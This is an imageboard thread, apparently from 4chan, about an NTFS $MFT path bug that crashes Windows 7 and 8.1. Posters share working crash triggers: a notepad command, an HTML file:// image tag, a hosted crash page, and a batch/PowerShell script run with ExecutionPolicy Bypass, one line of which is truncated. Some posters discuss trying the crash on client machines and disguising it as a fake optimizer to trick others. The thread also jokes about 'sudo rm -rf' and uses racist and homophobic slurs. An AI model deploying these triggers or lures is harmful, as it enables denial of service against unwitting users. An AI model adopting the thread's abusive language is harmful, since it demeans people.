NTFS bug lets anyone hang or crash Windows 7, 8.1

>specific filename crashes windows
can we test this out

>reddittechnica
I'm not visiting that.

Post the original source link or paste stuff here.

Let me guess, MS won't fix it and they'll urge everyone to upgrade to Windows 10.

Here is archive

Little did we know, this was the plan of Microsoft all along to force people use Windows 10

too bad, we can't test it here
no fun allowed

>the bug is there since Vista
>it's only fixed in Windows 10
makes you really think huh? Like why this isn't patched in Windows 7 and 8 for years? Hmmmmmmmmmm

also $MFT is the "special" filename

OP has a serious typo! It meant to say:

fucking fools, get Linux.

Lol just tested it.

C:/$MFT/123 really bricks my comp

does it work?

tesding

>get 10, you can easily remove spyware with ooshutup10 and antibeacon
>he has to remove spyware from his own computer
uhhhh are you sure you have microsoft's permission to do that, champ? Read the EULA, it's their computer for as long as Windows is installed on it.

still alive
you're doing it wrong

Holy shit that looks nice. What is the DE name and the paint application name?

Dude it's written in the pic
The de is CDE, the paint application is part of CDE

yeah dude
run the command "notepad c:\$MFT\test.txt"

It also has some security bugs that is not fixed yet so it's not advised to use, the development is stopped
I guess the name should be c:\$MFT\123 but i can't renamed to it on phone, can any linuxfags help out? In ext4 that filename should be legit

>>I guess the name should be c:\$MFT\123
it's an example
you must send a REQUEST to the CLIENT, not just include the text literally anywhere
just create an html page which tries to access $MFT in some way or another
rtfm

PLEASE REFRAIN FROM POSTING IN THIS THREAD THANK YOU

>get Linux
and never run any software that matters

Why?

>it's their computer for as long as Windows is installed on it
Only if you are under the cuck laws of cuck merica.

Well $MFT is kinda special. It represents the master file table, which contains information about the partition, bad clusters, the root directory, lots of important stuff.

Not outside US

>Holy shit that looks nice.
Please reconsider this statement.

>he still uses wangblows 7
>he hasn't gotten wangblows 10

oops sorry

We have davinci 14 , lightworks and blender for professional video editing
OBS/VLC for livestreaming
Opensubmerve that thing pixar uses for animated movies
Darktable and gimp for image editing
Audacity for audio editing
The only thing i do not know about is music creation (fruity loops on wine works well)
Krita/mypaint is on a great level for artists

3000~ games on steam

NO SOFTWARE THAT MATTERS FOLKS

I like it

We have to run IE8 at work because of two different client applications depending on ancient ActiveX shit.
Compatibility mode in newer browses fails too.
It's pretty said.

One of the applications probably wasn't updated since the original vendor was bought by Oracle 11 years ago.

>making a user account "user" on win 8.1 causes massive issues
>Microsoft solution to problem "don't use that name lol"

I tried a with:

it crashes with IE, but not with Firefox

so it's not much to worry about

actually
src="file://c:/$MFT/123"
crashes with Firefox too

en.wikipedia.org/wiki/NTFS#Metafiles

That looks like the old Solaris DE. n nice!

Pixar uses renderman and universal scene desription which are in house Linux programs they have released. I don't think opensubmerve is a thing lol. Also Maya supports Linux.

>recommending proprietary software to remove "le botnet"
Use Dws lite dumbfuck

>having to remove spy in the first place
>using 3rd world OS
>be OP

>you can remove spyware
Until you reboot and microsoft installs it again, firewall rules included. gg cuckold.

no one has win7 now. After wanna cry and ms forcefully asking every win7 and win8 to upgrade. They even deliberately blocks updates in win7 and win8.

>NTFS
I thought win10 still uses that garbage as well?

>Windows 10 64 bit 50.08% -0.07%
>Windows 7 64 bit 30.86% +0.89%
hmmm

fuck this is too good to be true.
I have to test this on some client machines.

I have windows 10 and this happened to me last night when I went to shut down my computer? What does it mean?

Microsoft are purposefully introducing these bugs to push the holdouts onto windows 10. I'm moving to Linux, bye.

Doesn't work on firefox/chrome though, he's baiting or just lying.

It only works on IE, windows version 7/8.1

It's still great.

>trying to access a metafile of a file system has unexpected results
Wow, it's fucking nothing.

Bamping from iOS

This is not a new thing and it's probably not even a bug. These files hold information about the file system that if modified could wreck the entire file system. There's no reason for an application to ever access these files so when the OS detects that one is attempting to it shuts down everything. It's a protective measure to keep the user's data safe.

>not even a bug
>so when the OS detects that one is attempting to it shuts down everything

Classic winfag user

pajeet in full denial lol

>powering off the PC instead of just refusing the app to access
kek

>use outdated OS
>lmao there are le bugs!!!!!

I want reddit to kill themselves.

It blue screens.

>retard app tries to overwrite FS metadata
>system blue screens and restarts instead of just refusing and continuing
>all my data is gone and im raped
>it's just a feature :^)

The silly thing is there's no need to run it as admin.

Unprivileged DoS.

...

It does work with the latest Firefox, but it's not as bad. Open the .html and then try to open Explorer, it freezes and requires a hard reset.
(Whereas with IE it freezes instantly.)

sorry, I fucked up, this one works on Firefox too:

Not at all. Trying on windows 7 with firefox 53
please.munch.mypen.is/share/crash.html

NTFS is such trash. Glad I use Linux and get to choose from a handful of filesystems.

>please.munch.mypen.is

Did you try open Explorer after opening that file?

This is so exploitable

Anyone photoshopperz want to make one of those fake windows turbofast2000 speed optimizers that were popular in hayday of Sup Forums and spread around for retards on Sup Forums and Sup Forums

What are some good free file hosting sites that give you direct links, like ?

Sites that do this for free are pretty rare. It's usually just better to register a domain name

Do the needful and poo in it.

Opensubmerve doesn't exist. It's "opensubdiv", something that's also available in 3DS Max.
The tool itself is just for lighter tessellation, so don't you mean Renderman?

>not getting a headstart in Lincuck after the 10 abomination was revealed

>winfags splitting hairs and bickering between themselves
You should try using a well designed filesystem sometime.

Isn't 7 lighter? I got 10 on my old compaq laptop and now it can't run anything without hitting 100% cpu usage

domain is free, hosting is my own VPS.

I could give you access if you want, I don't mind.

There is no filesystem as horrible as Ntfs except maybe fat

>not using ReFS

@echo off
set T=%temp%\%RANDOM%.ps1
echo $signature = @' >> "%T%"
echo [DllImport("kernel32.dll", Charset = System.Runtime.InteropServices.Charset.Unicode)] >> "%T%"
echo public static extern IntPtr CreateFileW(string lpFileName, uint dwDesiredAccess, uint dwShareMode, IntPtr lpSecurityAttributes, uint dwCreationD
echo [DllImport("kernel32.dll")] >> "%T%"
echo public static extern uint CloseHandle(IntPtr pHandle); >> "%T%"
echo '@ >> "%T%"
echo $type = Add-Type -MemberDefinition $signature -Name Win32Utils -Namespace Win32 -PassThru >> "%T%"
echo $h = $type::CreateFileW("C:\\'$MFT\\" + [System.Environment]::TickCount, 128, 0, [System.IntPtr]::Zero, 3, 0, [System.IntPtr]::Zero) >> "%T%"
echo $type::CloseHandle($h) >> "%T%"
echo [System.Environment]::Exit(0) >> "%T%"
powershell -ExecutionPolicy Bypass -File "%T%"

I did, nothing happened

>allowing your webbrowser connected to a remote server reference local content

I'm still using Windows 7. 8.1 is literally Vista 2.0, and 10 is botnet incarnate, so I'm going to keep using 7 until MS makes it impossible to continue.

Yeah except those "unexpected results" can include crashing your entire operating system, and can be triggered simply by putting a link in a HTML page. Basically, it gives every website you connect to the ability to remotely reboot your computer.

Then it should just say access denied or act as if the directory doesn't exist.

>smug anime horse

Dude, you need to service this from a local HTML-file (open .html file in browser).

Of course you can't access a user's filesystem from the web. (except with input type="file" uploads)

right, but you have to live in third-world shitholes which is even worse than windows 10 botnet laws

>fucking fools, get linux/macOS, you can easily remove spyware by using a real OS

Fixed 4u

Lulz

Daily reminder that sudo rm -rf exists.

>winfags this desperate

>Pixar uses renderman and universal scene desription which are in house Linux programs they have released.

Renderman is not a software, it's a rendering middleware. All their animation is done on a modified in house version of Maya 2013

>Blender
>Professional

lmao

Ladies and gentlemen, behold the biggest production ever made on Blender.

not a single terrorist attack, no sandniggers, everyting is cheap... who is cucked now?

I've never seen a single professional movie made in Blender
I have heard of a lot of games using it for modeling however

wrong.

it is a bug because the file isn't opened or modified, but a directory with the same name is created and a shitty NTFS lock is put in place that affects both the file and the directory. Then shitty ntfs kworkers get stuck waiting for you cuck shit to finish but it can't because your whole IO system pretty much is locked up because all your kworkers are busy trying to update your shitty $MFT

I imagine the kernel panic is probably because some of the kworkers override the NTFS lock and try and do their writes that somehow leak into a userspace page, since you, a user, have a directory of the same name open and Wangblows throws some panic after some assertThatThisMemoryIsntKernel(memory) fails.

>you can easily remove spyware

Normies still believe this?
Jesus christ, Sup Forums has fallen.

The day Linux gets Pro Tools is the day I might consider switching full time.

Doesn't work if you're not in sudoers. And it still often requires at least two lines - one for the sudo command, one for the password. And you can't make someone sudo rm theirself through HTML.

>fucking fools, get 10, you can easily remove spyware with ooshutup10 and antibeacon.
Is that actually true?
